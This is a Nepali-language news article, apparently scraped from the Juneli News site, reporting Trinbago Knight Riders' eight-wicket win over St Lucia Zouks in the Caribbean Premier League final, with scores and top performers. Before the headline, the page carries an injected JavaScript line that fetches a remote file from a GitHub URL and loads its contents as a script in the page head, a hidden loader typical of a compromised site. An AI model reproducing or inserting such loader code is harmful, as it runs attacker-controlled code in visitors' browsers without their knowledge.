;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सीपीएलको उपाधि ट्रिन्बागो नाइट राइडर्सले जित्यो – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सीपीएलको उपाधि ट्रिन्बागो नाइट राइडर्सले जित्यो
खेलकुद

सीपीएलको उपाधि ट्रिन्बागो नाइट राइडर्सले जित्यो

भदौ २६,

काठमाडौं । क्यारेबियन प्रिमियर लिग (सीपीएल) क्रिकेटको उपाधि ट्रिन्बागो नाइटराइडर्सले जितेको छ। गएराति ब्रायन लारा क्रिकेट एकेडेमी ट्रिनिडाडमा भएको फाइनल खेलमा ट्रिन्बागोले सेन्ट लुसिया जोउक्सलाई ८ विकेटले पराजित गरेको हो।

टस हारेर पहिला ब्याटिङमा तानिएको जोउक्सले ५ बल बाँकी छँदै सबै विकेट गुमाएर १ सय ५४ रन बनाएको थियो। उसका लागि आन्द्रे फ्लेचरले ३९ र मार्क डेयलले २९ रन बनाए। जवाफी ब्याटिङ गरेको ट्रिन्वागो नाइट राइडर्सले १८ दशमलब १ ओभरमा २ विकेट गुमाएर १ सय ५७ रन बनाउँदै लक्ष्य पार गर्‍यो।

प्रतियोगितामा खेलेका सबै खेल जितेर आएको एक मात्रै टिम ट्रिन्बागोलाई उपाधि दिलाउने क्रममा लेन्डल सिमोन्सले आउट नभई सर्वाधिक ८४ रनको योगदान गरे। ड्यारेन ब्राभो ५८ रनमा अविजित रहे।

प्रतियोगिताको सेमिफाइनलमा ट्रिन्बागोले नेपाली लेग स्पिनर सन्दिप लामिछाने आवद्ध जमैका तलावासलाई पराजित गरेको थियो। जोउक्सले भने गुयना अमेजन वारियर्सलाई हराउँदै फाइनलमा स्थान सुरक्षित गरेको थियो।

फेसबुक प्रतिक्रियाहरु